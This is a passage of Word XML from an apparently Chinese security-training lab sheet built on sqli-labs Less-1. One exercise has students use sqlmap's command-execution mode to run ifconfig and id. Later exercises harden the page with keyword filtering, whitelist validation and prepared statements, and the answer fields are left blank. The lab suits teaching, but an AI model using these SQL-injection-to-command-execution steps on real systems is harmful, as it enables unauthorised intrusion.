            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>执行系统命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3572" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3571" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3577" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3573" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3574" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>进入执行系统命令的模式</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3575" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:num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执行</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ifconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3576" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:num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执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3579" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3578" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3580" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C357A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C357B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C357C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C357D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C357E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C357F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3581" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3582" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc3678"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加固练习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="059C3583" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc17816"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键词过滤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3585" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3584" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3587" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3586" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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关键词过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3589" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3588" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C358B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C358A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过关键词过滤方式进行加固</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C358D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C358C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3592" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C358E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C358F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:num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通过联合查询方式测试该链接存在</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3590" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:num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lastRenderedPageBreak/>
              <w:t>通过修改代码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/var/www/html/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-labs/Less-1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>index.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>过滤联合查询的关键词</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3591" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:num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再次测试是否存在漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3594" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3593" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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lastRenderedPageBreak/>
              <w:t>实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C359B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3595" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3596" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3597" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3598" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3599" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C359A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C359C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C359D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc18051"/>
      <w:r>
        <w:t>参数校验</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C359F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C359E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35A1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35A0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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参数校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35A3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35A2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35A5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35A4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过参数校验方式进行加固</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35A7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35A6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35A8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35A9" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:num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通过联合查询方式测试该链接存在</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35AA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:num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通过修改代码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/var/www/html/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-labs/Less-1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>index.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>对传入参数进行合法性校验（白名单方式，需要提供两种加固方式）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35AB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:num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再次测试是否存在漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35AE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35AD" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35B5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35AF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="49"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35B0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35B1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="49"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35B2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35B3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="49"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35B4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C35B6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C35B7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc4267"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>预编译查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35B9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35B8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35BB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35BA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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预编译查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35BD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35BC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35BF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35BE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过预编</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>译方式</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>进行加固</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35C1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35C0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35C2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="50"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35C3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="50"/>
              </w:num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通过联合查询方式测试该链接存在</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35C4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="50"/>
              </w:num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通过修改代码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/var/www/html/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-labs/Less-1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>index.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>，将</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>查询改为预编译方式</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35C5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="50"/>
              </w:num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再次测试是否存在漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35C7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35CF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35C9" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="51"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
